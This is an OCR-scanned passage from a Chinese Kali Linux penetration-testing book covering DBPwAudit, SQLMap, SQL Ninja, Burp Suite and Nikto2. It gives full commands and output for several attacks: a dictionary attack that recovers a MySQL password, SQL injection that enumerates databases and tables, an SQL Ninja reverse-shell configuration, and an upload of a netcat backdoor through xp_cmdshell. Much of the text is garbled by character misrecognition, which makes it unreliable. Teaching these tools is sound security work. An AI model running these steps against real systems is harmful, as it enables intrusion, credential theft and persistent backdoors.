测试 ”两 个 部 分 。 虽 然 如 此 ， 我 们 应 该 非 第 清楚 二 者 之 间 的 关系 ， 以 及 
它们 组 成 的 复合 技术 架构 。Kali Linux 提供 了 多 款 能 够 对 Web 应 用 程序 
和 数据 库 程 序 进 行 综合 评估 分 析 的 安全 评估 工具 。 也 束 是 说 ， 有 些 工 具 
能 够 通过 Web 应 用 程序 〈 即 前 端 ) 攻击 后 台数 据 库 (如 SQL 注 入 ) 。 

7.8.1 数据 库 评 估 工 具 


本 节 将 介绍 Kali Linux 的 三 球 数 据 库 分 析 工 具 。 这 三 球 分 析 工 具 分 
别 用 于 MS-SQL、MySQL 和 Oracle 数据 库 的 安全 测试 。 本 文 会 逐一 演 
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示 它 们 的 基本 功能 和 功能 。 这 些 工 具 主 要 用 于 数据 库 的 指纹 指纹 、 服 务 
枚 举 、 密 码 审计 ， 以 及 评估 目标 系统 遭受 SQL 注 入 攻击 的 可 能 性 。 审 计 
人 员 可 利用 这 些 工具 掌握 前 端的 Web 漏 洞 ， 并 同时 发 现 后 台数 据 库 的 安 
全 弱点 。 

如 需 详细 了 解 — SQL ”诸如 攻击 及 有 关 类 型 ， 请 参见 。 http:// 
hakipedia.com/index.php/SQL Injection. 

1. DBPwAudit 

DBPwAudit/é —3X 8 ilOracle. MySQL. MS-SQL 和 IBM DB2 服务 
ds MAZE PER LR, CæJavaft F. aK LOCKS EX fS] Y TFT 
数据 库 〈 评 佑 〉 拉 术 的 难度 。 在 目标 系统 没有 采用 强 密码 安全 集 略 的 情 
况 下 ， 它 可 帮助 渗透 测试 人 员 找 到 数据 库 管理 系统 的 有 效 账 户 。 目 前 ， 
它 文 持 字典 式 密码 攻击 机 制 |。 

如 需 启 动 DBPwAudit 程序 ， 可 在 桌面 沫 单 里 依次 选中 Kali Linux | 
Vulnerability Analysis | Database Assessment | dbpwaudit， 或 者 在 shell 中 
使 用 下 述 指令 。 

# cd /usr/share/dbpwaudit/ 

# dbpwaudit 

上 述 指令 将 在 屏幕 上 显示 程序 的 所 有 选项 及 使 用 说 明 。 如 需 知 道 
DBPwAudit 可 以 驱动 的 数据 库 类 型 ， 可 使 用 下 述 指令 。 

# dbpwaudit -L 

上 述 指令 将 列 出 该 程序 可 以 审计 的 数据 库 类 型 。 特 别 要 注意 数据 库 
系统 的 别名 (aliases〉， 在 命令 行 中 指定 数据 库 类 型 时 要 使 用 数据 库 的 
别名 。 

本 文 将 演示 该 程序 审计 MySQL 数 据 的 方法 。 在 此 之 前 ， 我 们 首先 
要 安装 好 MySQL 驱 动 程序 。 在 安装 好 MySQL 驱 动 程序 之 后 ， 我 们 可 测 
试 目标 数据 库 系 统 是 否 含有 第 见 账 己 。 在 进行 字典 式 测试 之 前 ， 我 们 需 
要 提前 准备 好 两 个 字典 文件 ， 即 users.txt 和 passwwords.txt。 然 后 使 用 下 

















述 指令 。 

# dbpwaudit -s 10.2.251.24 -d pokeronline -D MySQL -U \ users.txt —P 

passwords.txt 

DBPwAwudit v0.8 by Patrik Karlsson <patrik@cqure.net> 

[Tue Sep 14 17:55:41 UTC 2013] Starting password audit ... 

[Tue Sep 14 17:55:41 UTC 2013] Testing user: root, pass: admin123 

[Tue Sep 14 17:55:41 UTC 2013] Testing user: pokertab, pass: 
admin123 

ERROR: message: Access denied for user 'root'@'10.2.206.18' (using 
password: YES), code: 1045 

[Tue Sep 14 17:55:50 UTC 2013] Testing user: root, pass: RolVer123 

ERROR: message: Access denied for user 'pokertab'(2'10.2.206.18' 
(using password: YES), code: 1045 

[Tue Sep 14 17:55:56 UTC 2013] Testing user: pokertab, pass: 
RolVer123 


[Tue Sep 14 17:56:51 UTC 2013] Finnishing password audit ... 

Results for password scan against 10.2.251.24 using provider MySQL 

user: pokertab pass: RolVer123 

Tested 12 passwords in 69.823 seconds (0.17186314tries/sec) 

上 面 信息 表明 ， 该 程序 成 功 地 发现 了 一 个 有 效 的 用 尸 账户 。 上 述 指 
SH, -d 选项 代表 目标 数据 库 的 名 称 ，-D 选项 用 于 指定 相应 的 数据 库 
管理 系统 (DBMS) 。-U 选项 指定 用 户 名 字典 ，-P 选 项 则 用 来 指定 采用 
的 密码 字典 。 

2. SQLMap 





SQLMap 是 一 蒜 先 进 的 自动 执行 SQL 注入 的 审计 工具 。 针 对 指定 的 
URL， 它 可 以 扫描 、 发 现 并 利用 SQL 注入 漏洞 。 目 前 ，SQLMap 文 持 的 
数据 库 管 理 系统 包括 MS-SQL、MVySQL、Oracle 和 PostgreSQL 。 略 微 处 
理 之 后 ， 它 也 能 够 识别 诸如 DB2、Informix、Sybase、Interbase 和 MS 
Access 之 类 的 数据 库 系 统 。SQLMap 采用 4 种 独特 的 SQL 注入 技术 ， 分 
别 是 SQL 盲 注 、 联 合 查询 SQL 注入 、 累 加 式 注 入 〈stacked query) 和 基 
于 时 间 的 SQL 盲 注入。 它 功 能 广泛 ， 可 对 数据 库 进 行 指纹 识别 、 服 务 枚 
举 、 数 据 提 取 ， 并 可 访问 目标 主机 的 文件 系统 ， 在 获取 完全 操作 权时 甚 
至 可 以 执行 任意 命令 。 此 外 ， 该 工具 还 可 以 从 Burp Proxy 或 Web Scarab 
的 日 志 ， 以 及 标准 的 文本 文件 中 解析 测试 目标 的 列表 。 它 还 能 够 调用 
Google dorks 的 分 类 数据 ， 使 用 Google 搜 索引 擎 搜索 指定 目标 的 可 测试 
网 址 。 

如 需 深 入 了 解 Google dorks 的 各 种 用 法 ， 请 访问 Google 
HackingDatabase 的 官方 网 址 : http://www.hackersforcharity.org/ghdb/. 

如 需 启动 SQRLMap 程序， 可 在 柬 面 荣 单 里 依次 选中 Kali Linux | 
Vulnerability Analysis |Database Assessment | sqlmap， 或 者 在 shell 中 使 用 
下 述 指令 。 

# cd /usr/share/sqlmap/ 

# sqlmap -h 

上 述 命令 将 显示 所 有 可 用 的 选项 。 这 些 选 项 可 以 分 为 11 个 逻辑 分 
类 ， 即 目标 规格 、 连 接 请 求 参数 、 注 入 payload、 注 入 技术 、 指 纹 识别 、 
枚 举 选 项 、 用 户 上 自 定 义 函 数 CUDEF) 注入 、 文 件 系 统 访问 选项 、 操 作 系 
统 访问 选项 、Windows 注册 表 访 问 和 其 他 杂项 。 在 下 文 的 这 个 例子 中 ， 
我 们 将 使 用 多 个 指纹 识别 类 选项 和 服务 枚 举 类 选项 ， 获 取 被 测 数 据 库 系 
统 的 特征 信息 。 

# sqlmap -u "http://testphp.example.com/artists.php?artist=2" -p "artist"- 








f -b --current-user --current-db --dbs --users 


[*] starting at: 11:21:43 

[11:21:43] [INFO] using 
"usr/share/sqlmap/output/testphp.example.com/session' as session file 

[11:21:43] [INFO] testing connection to the target url 

[11:21:45] [INFO] testing if the url is stable, wait a few seconds 

[11:21:49] [INFO] url is stable 

[11:21:49] [INFO] testing sql injection on GET parameter 'artist' with 0 
parenthesis 

[11:21:49] [INFO] testing unescaped numeric injection on GET 
parameter ‘artist’ 

[11:21:51] [INFO] confirming unescaped numeric injection on GET 
parameter ‘artist’ 

[11:21:53] [INFO] GET parameter 'artist is unescaped numeric 
injectable with 0 parenthesis 

[11:21:53] [INFO] testing for parenthesis on injectable parameter 

[11:21:56] [INFO] the injectable parameter requires 0 parenthesis 

[11:21:56] [INFO] testing MySQL 

[11:21:57] [INFO] confirming MySQL 

[11:21:59] [INFO] retrieved: 2 

[11:22:11] [INFO] the back-end DBMS is MySQL 

[11:22:11] [INFO] fetching banner 

[11:22:11] [INFO] retrieved: 5.0.22-Debian_Oubuntu6.06.6-log 

[11:27:36] [INFO] the back-end DBMS operating system is Linux 


Debian or Ubuntu 


[11:28:00] [INFO] executing MySQL comment injection fingerprint 


web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or 
Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS operating system: Linux Debian or Ubuntu 
back-end DBMS: active fingerprint: MySQL >= 5.0.11 and < 5.0.38 
comment injection fingerprint: MySQL 5.0.22 
banner parsing fingerprint: MySQL 5.0.22, logging enabled 
html error message fingerprint: MySQL 
[11:31:49] [INFO] fetching banner 
[11:31:49] [INFO] the back-end DBMS operating system is Linux 
Debian or Ubuntu 
banner: '5.0.22-Debian_Oubuntu6.06.6-log' 
[11:31:49] [INFO] fetching current user 
[11:31:49] [INFO] retrieved: fanart@localhost 
current user: 'fanart(glocalhost' 
[11:34:47] [INFO] fetching current database 
[11:34:47] [INFO] retrieved: fanart 
current database: fanart 
[11:35:57] [INFO] fetching database users 
[11:35:57] [INFO] fetching number of database users 
[11:35:57] [INFO] retrieved: 1 
[11:36:04] [INFO] retrieved: 'fanart'@'localhost' 
database management system users [1]: 
[*] 'fanart'@'localhost' 
[11:39:56] [INFO] fetching database names 
[11:39:56] [INFO] fetching number of databases 
[11:39:56] [INFO] retrieved: 3 


[11:40:05] [INFO] retrieved: information_schema 

[11:43:18] [INFO] retrieved: fanart 

[11:44:24] [INFO] retrieved: modrewriteShop 

available databases [3]: 

[*] fanart 

[*] information_schema 

[*] modrewriteShop 

[11:47:05] [INFO] Fetched data logged to text files under 


‘/usr/share/sqlmap/output/testphp.example.com' 


这 一 时 刻 ， 我 们 成 功 地 发 现 了 artist 参 数 存在 注入 问题 。 上 述 指令 
中 ，-p 选 项 用 来 指定 目标 URL 里 需要 测试 的 参数 。 默 认 情 况 下 ， 
SQLMap 会 扫描 所 有 可 用 的 参数 (GET、POST、HTTPCookie 和 User- 
Agent) ， 但 是 我 们 通过 指定 参数 (-p"Parameter 1, Parameter 2") 限制 
了 测试 对 象 的 范围 。 这 将 提升 SQL 注入 的 速度 ， 从 而 提高 访问 后 台数 据 
库 的 速度 。 在 下 面 的 测试 中 ， 我 们 使 用 --tables 选 项 和 -D 选 项 ， 从 数据 库 
fanart 中 提取 所 有 表 的 信息 。 


# sqlmap -u "http://testphp.example.com/artists.php?artist=2" --tables -D 





fanart -v 0 

[*] starting at: 12:03:53 

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or 
Dapper Drake) 

web application technology: Apache 2.0.55, PHP 5.1.2 

back-end DBMS: MySQL 5 

Database: fanart 

[7 tables] 


| artists | 

| carts | 

| categ | 
| featured | 

| guestbook | 
| pictures | 


| users | 


上 述 信息 表明 ， 由 于 两 次 测试 都 使 用 了 相同 的 URL. SQLMap fE 
序 使 用 了 上 次 会 话 〈session) 中 提取 的 指纹 信息 ， 并 没有 从 头 对 数据 库 
进行 测试 。 这 种 功能 可 让 用 户 随 时 终止 并 保存 测试 会 话 ， 以 便 在 后 续 阶 
段 继 续 此 次 会 话 。 此 处 ， 我 们 还 可 以 使 用 --dump 或 --dump al 选项 ， 对 数 
据 库 信 息 进 行 自 动 存 储 。 这 个 程序 还 有 其 他 一 些 高 级 选项 ， 例 如 --os- 
cmd. --os-shell 或 --os-pw 用 于 可 帮助 渗透 测试 者 获得 远程 访问 系统 权 
限 ， 并 执行 任意 命令 。 但 是 ， 此 类 功能 仅 文 持 MS-SQL、MySQL 和 
PostgreSQL 这 三 种 运行 于 操作 系统 的 数据 库 系统 。 如 果 还 需要 使 用 
SQLMap 的 其 他 选项 ， 可 参考 官方 教程 中 的 实例 : http://sqlmap. 
sourceforge.net/doc/ README.html. 

Metasploit 框 架 可 以 文 持 SQLMap 的 哪些 选项 ? 

SQLMap 的 --ospwn 选 项 、--os-smbrelay 选 项 、--priv-sec 选 项 和 --msf- 
path 选 项 ， 都 是 在 数据 库 系统 的 操作 系统 上 执行 的 指令 选项 。Metasploit 
可 通过 三 种 payload 使 用 这 些 选项 : shell、 交 互 式 命令 环境 和 GUI 访问 
(VNC) 。 

3. SQL Ninja 

SQL Ninja ZÉ —;XSQL 注入 的 审计 工具 ， 专 门 用 于 评估 后 台数 据 库 
采用 MS-SQL ”Server 的 Web 应 用 程序 。 它 可 通过 SQL 注 入 漏洞 获取 远程 
数据 库 服务 器 的 shell 运 行 权限 ， 而 不 是 提取 数据 库 数据 的 工具 。SQL 




















Ninja 的 功能 有 : 对 服务 强 进 行 指纹 识别 、 雄 力 人 破解 密码 、 提 升 权 限 、 
上 传 后 门 、 直 接 调用 shell、 反 连 方法 连接 shell〈 绕 过 防火 墙 的 技术 ) 、 
反射 shell、DNS 了 隧道、 单 命 令 执行 等 。 它 还 可 以 与 Metasploit 进 行 集成 。 
因此 ， 它 不 仅 是 扫 朱 SQL 注入 漏洞 的 工具 ， 而 且 还 是 利用 已 知 漏洞 获取 
操作 系统 访问 权限 的 工具 。 

SQL Ninja 不 是 初学 者 玩 的 玩具 。 如 果 您 需要 配置 并 使 用 这 种 工 
有 具 ， 请 详细 阅读 作者 的 使 用 说 明 ， 在 实际 应 用 前 充分 了 解 这 蒜 工 具 。 

如 需 启 动 SQRL Ninja, AERIS Re Kali Linux | 
Vulnerability Analysis [Database Assessment | sqlninja， 或 者 在 shell 中 使 用 
PIRES 

# sqlninja 

上 述 指令 将 在 屏幕 上 显示 程序 所 有 的 可 用 选项 。 在 进行 测试 前 ， 需 
要 根据 已 反映 目标 的 情况 更 改 配置 文件 的 参数 和 利用 漏洞 的 选项 。 首 
先 ， 您 要 将 样本 配置 文件 解压 缩 出 来 ， 把 它 重 新 命名 ， 然 后 移动 到 正确 
的 目录 中 ， 进 行 如 下 修改 。 

# cd /usr/share/doc/sqlninja/ 

















# gzip -d sqlninja.conf.example.gz 

# cp sqlninja.conf.example.gz /usr/share/sqlninja/sqlninja.conf 

然后 ， 我 们 要 修改 配置 文件 ， 使 其 符合 我 们 的 测试 内 容 。 您 需要 在 
配置 文件 中 找到 下 述 内 容 ， 然 后 删除 行 首 的 注释 符号 ， 并 根据 实际 情况 
对 有 关 选 项 进行 调整 。 

本 文 根 据 情 况 将 配置 文件 的 下 述 内 容 进行 了 调整 。 


# vim sqlninja.conf 














# Host (required) 
host = testasp.example.com 


# Port (optional, default: 80) 


port = 80 

# Vulnerable page (e.g.: /dir/target.asp) 

page = /showforum.asp 

stringstart = id=0; 

# Local host: your IP address (for backscan and revshell modes) 

lhost = 192.168.0.3 

msfpath - /usr/share/exploits/framework3 

# Name of the procedure to use/create to launch commands. Default is 

# "xp cmdshell". If set to "NULL", openrowset+sp_oacreate will be 
used 

# for each command 


xp. name - xp cmdshell 


在 上 述 配置 文件 中 ， 我 们 仅 修 改 了 一 些 必要 的 参数 ， 其 他 没有 提 及 
的 内 容 均 采 用 了 默认 值 。 另 外 ， 在 使 用 SQL Ninja 之 前 ， 您 还 有 必要 使 
用 其 他 工具 检查 SQL 注入 的 漏洞 。 在 配置 好 配置 文件 之 后 ， 您 就 可 以 使 
用 它 的 攻击 模式 -m t/test 对 目标 进行 检测 。 


# sqlninja -mt 





Sqlninja rel. 0.2.3 

Copyright (C) 2006-2008 icesurfer <r0O0t@northernfortress.net> 
[+] Parsing configuration file................ 

[+] Target is: testasp.targetdomain.com 

[+] Trying to inject a 'waitfor delay'.... 


[+] Injection was successful! Let's rock !! :) 


可 见 ， 程 序 成 功 地 识别 出 了 配置 文件 的 各 种 设置 ， 而 且 盲 注 测 试 取 
得 了 成 功 。 接 下 来 ， 我 们 可 以 对 目标 进行 指纹 识别 ， 以 获取 SQLServer 


的 更 多 信息 ， 并 取得 目标 操作 系统 的 操作 权限 。 
# sqlninja -m f 
Sqlninja rel. 0.2.3 
Copyright (C) 2006-2008 icesurfer «rOOt(2northernfortress.net^ 
[+] Parsing configuration file................ 
[+] Target is: testasp.example.com 
What do you want to discover ? 
0 - Database version (2000/2005) 
1 - Database user 
2 - Database user rights 
3 - Whether xp cmdshell is working 
4 - Whether mixed or Windows-only authentication is used 
a - All of the above 
h - Print this menu 
q - exit 
>a 
[+] Checking SQL Server version... 
Target: Microsoft SQL Server 2005 
[+] Checking whether we are sysadmin... 
No, we are not 'sa'.... :/ 
[+] Finding dbuser length... 
Got it ! Length = 8 
[+] Now going for the characters........ 
DB User is....: achcMiU9 
[+] Checking whether user is member of sysadmin server role.... 
You are an administrator ! 


[+] Checking whether xp_cmdshell is available 


xp. cmdshell seems to be available :) 


Mixed authentication seems to be used 


>q 


上 述 信息 表明 ， 目 标 系 统 存在 漏洞 ， 其 指定 的 数据 库 安 全 策略 并 不 
够 安全 。 我 们 有 机 会 上 传 NetCat 的 后 门 程序 ， 继 而 获取 被 攻陷 主机 的 长 
期 控制 权 ， 并 可 通过 它 的 shell 执 行 任意 的 指令 。 此 时 ， 人 们 常用 
Metasploit 的 攻击 模式 进行 进一步 的 渗透 。 

# sqlninja -m u 

Sqlninja rel. 0.2.3 

Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net> 

[+] Parsing configuration file................ 

[+] Target is: testasp.targetdomain.com 

File to upload: 
shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr 

>1 

[+] Uploading scripts/nc.scr debug script............ 

1540/1540 lines written 

done ! 

[+] Converting script to executable... might take a while 

[+] Completed: nc.exe is uploaded and available ! 

至 此 ， 我 们 已 经 成 功 上 传 后 门 。 然 后 我 们 可 通过 该 后 门 获 得 
s/dirshell、k/backscan 或 rrevshell。 此 外 ， 采 用 my/metasploit 的 高 级 选项 可 
以 使 用 Metasploit ”框架 的 SQLNinja 封 装 程 序 访 问 目 标 主 机 的 GUI。 如 盐 
详细 了 解 SQLNinja 的 使 用 方法 或 它 的 配置 文件 ， 请 访问 


http://sqlninja.source forge.net/sqlninja-howto.html. 


7.8.2 Web 应 用 程序 评估 工具 


本 节 介 绍 的 工具 主要 关注 Web 基 础 设施 前 端 程序 的 安全 性 。 它 们 都 
可 以 识别 、 分 析 并 利用 应 用 程序 的 安全 漏洞 。 这 些 漏洞 包括 绥 冲 区 游 
出 、 跨 站 脚本 CXSS) 、 oh 注入 、SSI 注入 、XML 注 入 、 应 用 配置 错 
误 、 功 能 洲 用 、 会 话 预 测 、 信 息 泄露 以 及 许多 其 他 类 型 的 漏洞 。7.2 节 
己 经 讨论 过 ， oR ET 类 标准 。 如 需 更 深入 了 解 这 些 漏 洞 
的 特性 ， 强 烈 建议 读者 掌握 上 述 漏洞 分 类 标准 。 

1. Burp Suite 

Burp Suite 组 合 了 一 系列 功能 强大 的 Web 应 用 程序 的 安全 工具 。 这 些 
工具 能 够 演示 攻击 人 员 对 Web 应 用 程序 的 渗透 方法 。 它 们 能 够 或 手动 或 
自动 地 扫描 、 分 析 并 利用 Web 应 用 程序 的 安全 漏洞 。Burp Suit 将 有 关 工 
有 具 整合 为 一 体 ， 能 够 在 多 个 工具 之 间 传 递 和 共享 信息 ， 成 为 了 一 个 完整 
的 攻击 平台 。 这 一 特性 使 得 Burp um n te 
THER 

如 需 局 动 Burp Suit, Fy Eee AK ee Kali Linux | Web 
Applications | Web Vulnerability Scanners | burpsuite， 或 在 终端 中 使 用 下 
述 指令 

# burpsuite 

上 述 指令 将 在 屏幕 上 显示 Burp Suite 的 程序 窗口 。 您 可 以 通过 对 应 
的 选项 卡 访 问 它 所 集成 的 全 部 工具 (Target. Proxy. Spider. Scanner, 
Intruder、Repeater、Sequencer、Decoder 和 Comparer) 。 如 需 了 解 它 们 
的 用 法 和 配置 等 详细 信息 ， 可 以 使 用 Help 沫 单 或 者 访问 
http://www.portswigger.net/suite/help.html。 本 例 将 使 用 Burp Suite 的 多 个 
工具 分 析 小 型 的 Web 应 用 程序 。 要 注意 ，Burp Suite 有 两 个 版 本 : 免费 
版 和 商业 版 。Kali Linux 收录 的 版 本 是 它 的 免费 版 ， 因 此 有 些 功 能 受到 
限制 。 使 用 Burp Suite 检查 SQL 注入 漏洞 的 相应 步骤 如 下 。 














1. 首先 ， 选 择 Proxy | Options, 7 frproxy listeners 的 属性 。 本 例 采 用 
程序 的 默认 设置 ， 即 监听 8080 端口 。 您 还 可 以 根据 评估 任务 的 实际 情 
况 设置 这 个 界面 的 其 他 选项 ， 例 如 主机 重 定向 、SSL 证 书 、 客 户 端 请 求 
拦截 、 服 务 器 啊 应 拦截 、 页 面 属性 和 请 求 头 修改 等 。 

2. 选择 Proxy | Intercept, XF intercept is on 标签 。 

3. 打开 你 最 习惯 的 浏览 器 (例如 Firefox) ， 并 设置 HTTP/HTTPS 协 
议 的 代理 服务 器 为 本 地 代理 (127.0.0.1， 8080) 。 代 理 服务 器 能 够 拦 
截 、 检 查 并 修改 浏览 器 发 往 目 标 Web 应 用 程序 之 间 的 客户 端 请 求 ， 并 且 
能 够 记录 服务 器 发 回 的 所 有 啊 应 。 在 这 种 设置 中 ，Burp Suite 的 功能 类 
似 中 间 人 代理 服务 器 。 

4. 浏览 目标 网 站 例如，http: //testphp.targetdomain.com) ， 您 可 在 
Burp Suite 的 Proxy | Intercept 选 项 卡 中 看 到 浏览 器 发 送 的 请 求 数据 (http 
request) 。 在 本 例 中 ， 我 们 不 对 浏览 器 请 求 进行 任何 修改 ， 直 接 转发 这 
个 请 求 。 如 需 修改 请 求 ， 可 以 在 Raw、Headers 或 者 Hex 选 项 卡 中 修改 。 
清 注意 ， 在 访问 索引 页 Gndex) 等 网 页 时 ， 浏 览 器 会 对 网 页 中 的 各 种 
资源 例如 图 像 、Flash 文 件 ) 发 送 单独 的 获取 请 求 。 

5. 在 此 ， 强 烈 建议 访问 尽 可 能 多 的 网 页 ， 以 帮助 Burp Suite 列 出 可 
用 页 的 GET 和 POST 请 求 。 当 然 ， 也 可 以 使 用 程序 的 Spider 功能 自动 完 
成 分 析 过 程 。 如 需 使 用 Spider 的 爬虫 功能 ， 可 在 菜单 中 选中 Target | 
Site Map， 右 键 点 击 目 标 网 址 (本 例 是 http://testphp.examples.com) ， 然 
后 选择 spider this host。 此 后 ， 程 序 将 会 自动 发 现 、 扫 描 可 用 页 面 ， 当 遇 
到 需要 递交 数据 的 页 面 〈 例 如 登录 ) 时 ， 程 序 将 提示 您 进行 人 工 干预 。 
此 操作 结束 后 ， 可 在 Target | Site map 选 项 卡 右 侧 的 面板 中 查看 可 访问 网 
页 清单 和 页 面 属性 (方法 、URL、 参 数 、 啊 应 人 码 等 ) 。 

6. 您 可 选择 一 个 采用 GET 或 POST 模式 传递 参数 的 页 面 ， 用 Intruder 
进行 测试 。 关 键 是 要 找到 可 能 的 参数 标识 符 ， 获 取 有 用 数据 ， 并 对 这 些 
参数 进行 模糊 测试 ， 以 检测 己 知 漏洞 。 右 键 单 击 选 定 的 请 求 ， 并 选择 














send to intruder。 本 例 测 试 的 网 址 是 
http://testphp.targetdomain.com/listproducts. php?artist=2; 程序 将 以 不 同 
长 度 的 字符 蔡 代 2， 以 找到 已 知 的 漏洞 。 

7. 接 下 来 ， 我 们 要 指定 攻击 类 型 以 及 有 效 载荷 (payload) 的 位 置 

(Intruder | Positions) ， 以 进行 自动 测试 。 有 效 载 荷 的 位 置 有 828 标 识 。 
然后 ， 我 们 通过 菜单 进入 Intruder | Payloads， 从 预定 义 字 符 块 列表 中 选 
择 预定 义 的 有 效 载荷 (payload) ， 本 例 选择 Character blocks。 当 然 ， 您 
还 可 以 指定 上 自 定 义 的 有 效 载 荷 。 设 置 完毕 后 ， 选 择 菜 单 Intruder | Start A 
行 测试 任务 。 此 时 ， 程 序 将 会 在 弹出 的 窗口 里 显示 测试 目标 应 用 程序 时 
发 送 的 全 部 请 求 。 竺 程序 处 理 完 所 有 指定 的 有 效 载荷 之 后 ， 我 们 可 通过 
远程 啊 应 的 比较 结果 判断 Web 应 用 程序 的 意外 行为 。 使 用 鼠标 右键 点 击 
选 定 的 请 求 并 选择 send response to comparer， 即 可 对 响应 进行 比较 。 
Burp Suite 可 以 对 两 个 (或 更 多 ) 的 请 求 或 响应 进行 逐 字 逐 节 Cbytes Fil 
words) 的 比较 。 如 需 详细 了 解 各 种 攻击 类 型 ， 请 访问 
http://www. portswigger.net/burp/help/intruder_positions. html#attacktype; 
如 需 了 解 有 关 有 效 载 荷 选项 的 更 多 信息 ， 请 访问 
http://www. portswigger.net/burp/help/ intruder_payloads_types.html. 

8. FELL BM MAI EF, RIEME FANEAR TOR FE SQL 
注入 漏洞 。 为 了 验证 其 真实 性 ， 我 们 决定 使 用 Repeater 重 现 该 请 求 。 即 
使 用 鼠标 右键 点 击 该 请 求 ， 人 然后 选择 send request to repeater， 之 后 单 击 
Repeater 选项 卡 中 的 go 按钮 ， 将 会 立即 获取 指定 请 求 的 远程 啊 应 。 在 
本 例 中 ， 我 们 注意 到 啊 应 页 面 中 的 下 述 错误 信息 。 

Error: Unknown column 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAA' in 'where clause' 


Warning : mysql fetch array(): supplied argument is not a valid 




















MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php 


on line 74 

9. 上 述 信息 是 SQL 注入 漏洞 的 典型 特征 。 除 了 检验 这 种 类 型 的 安全 
问题 ， 我 们 还 可 以 使 用 Burp Suite sequencer 测试 应 用 程序 session 
tokens 的 散 化 程度 ， 检 测 session 的 可 预测 问题 。 有 关 sequencer 的 基本 用 
法 ， 请 参见 http://www.portswigger. net/suite/sequencerhelp.html . 

Burp Suite 是 球 多 功能 的 Web 应 用 程序 安全 工具 。 它 是 应 用 广泛 、 
功能 强大 的 Web 应 用 程序 攻击 平台 。 篇 幅 所 限 ， 本 文 不 逐一 介绍 它 的 各 
个 功能 。 所 以 ， 我 们 强烈 建议 您 通过 它 的 官方 网 站 

(http://www.portswigger.net/) 详细 了 解 它 的 各 种 用 法 。 

2. Nikto2 

Nikto2 是 一 球 基 础 的 Web 服 务 器 安全 扫描 工具 。 它 可 以 扫描 、 检 测 

由 下 述 问 题 引 起 的 的 安全 漏洞 : 服务 喜 的 配置 不 当 问 题 、 默 认 和 不 安全 
的 文件 、 过 旧 的 服务 端 应 用 程序 。Nikto2 程 序 完 全 是 LibWhisker2 的 再 开 
发 版 。 因 此 ， 它 支持 跨 平台 部 署 、SSL、 常 见 的 主机 身份 验证 方式 
(NTLM/Basic) 、 多 代理 ， 并 采用 了 多 种 IDS 规避 技术 。 它 还 文 持 子 
域名 枚 举 、 应 用 程序 安全 检查 (XSS、SQL 注 入 等 ) ， 并 能 够 使 用 字典 
的 攻击 方法 猜测 认证 信息 。 

如 需 局 动 Niklo2 程序 ， 可 在 果 面 染 单 里 依次 选中 Kali Linux | Web 


Applications | Web Vulnerability Scanners | nikto， 或 者 在 终端 中 使 用 下 述 
ta 











# nikto 

FRESKERNA AT RRE. FEAR BI, BOAT fS HI-T 
选项 对 目标 主机 执行 一 组 特定 的 测试 。 有 关 各 个 选项 的 详细 说 明和 使 用 
方法 ， 请 访问 http://cirt.net/nikto2-docs/. 

# nikto -h testphp.example.com -p 80 -T 3478b -t 3 -D \ V -o webtest —F 

htm 

- Nikto v2.1.5 


V:Sat Sep 18 14:39:37 2013  - Initialising plugin 
nikto apache expect xss 

V:Sat Sep 18 14:39:37 2013 - Loaded "Apache Expect XSS" plugin. 

V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto apacheusers 

V:Sat Sep 18 14:39:37 2013 - Loaded "Apache Users" plugin. 

V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto cgi 

V:Sat Sep 18 14:39:37 2013 - Loaded "CGI" plugin. 

V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto core 

V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto dictionary. attack 


V:Sat Sep 18 14:39:38 2013 - Checking for HTTP on port 
10.2.87.158:80, using HEAD 

V:Sat Sep 18 14:39:38 2013 - Opening reports 

V:Sat Sep 18 14:39:38 2013 - Opening report for "Report as HTML" 
plugin 

* Target IP: 10.2.87.158 

+ Target Hostname:  testphp.example.com 

+ Target Port: 80 

+ Start Time: 2013-09-19 14:39:38 


+ Server: Apache/2.0.55 (Ubuntu) mod python/3.1.4 Python/2.4.3 
PHP/5.1.2 mod_ ssl/2.0.55 OpenSSL/0.9.8a mod perl/2.0.2 Perl/v5.8.7 

V:Sat Sep 18 14:39:40 2013 - 21 server checks loaded 

V:Sat Sep 18 14:39:41 2013 - Testing error for file: /.89xvY XD 


+ OSVDB-877: HTTP TRACE method is active, suggesting the host is 
vulnerable to XST 

V:Sat Sep 18 14:40:49 2013 - Running scan for "Server Messages" 
plugin 

+ OSVDB-0: mod ssl/2.0.55  OpenSSL/0.9.8a | mod perl/2.0.2 
Perl/v5.8.7 -mod ssl 2.8.7 and lower are vulnerable to a remote buffer 
overflow which may allow a remote shell (difficult to exploit). 
http://cve.mitre.org/cgi-bin/cvename.cgi?name= CVE-2002-0082, OSVDB- 
756. 


V:Sat Sep 18 14:41:04 2013 - 404 for GET: /tiki/tiki-install.php 

V:Sat Sep 18 14:41:05 2013 - 404 for 
GET: /scripts/samples/details.idc 

* 21 items checked: 15 item(s) reported on remote host 

* End Time: 2013-09-19 14:41:05 (87 seconds) 

* 1 host(s) tested 

V:Sat Sep 18 14:41:05 2013 + 135 requests made 

上 述 指 令 中 ，-T 选项 指定 测试 类 型 为 Information Disclosure 〈 信 息 
泄露 ) 、Injection (XSS/Script/HTML) . Remote File Retrieval (Server 
Wide) 、Command Execution 和 Software Identification 〈 软 件 识 别 ) ; -t 
选项 控制 每 个 测试 类 型 执行 的 超时 时 间 : -DV 选项 控制 显示 格式 ; -o 和 - 
F 选 项 用 于 定义 扫描 报告 以 特定 的 格式 和 编号。Nikto 还 有 其 他 的 选项 ， 
例如 -mutate《〈 猜 测 子 域 、 文 件 、 目 录 、 用 户 名 ) 、-evasion (规避 IDS 检 
测 ) 和 -Single 〈 单 组 规则 测试 模式 ) ， 都 可 以 用 来 进行 更 为 深入 的 安全 
评估 。 


3. Paros Proxy 


Paros Proxy 是 一 球 名 不 见 经 传 的 深入 分 析 安 全 湄 洞 的 评估 工具 。 它 
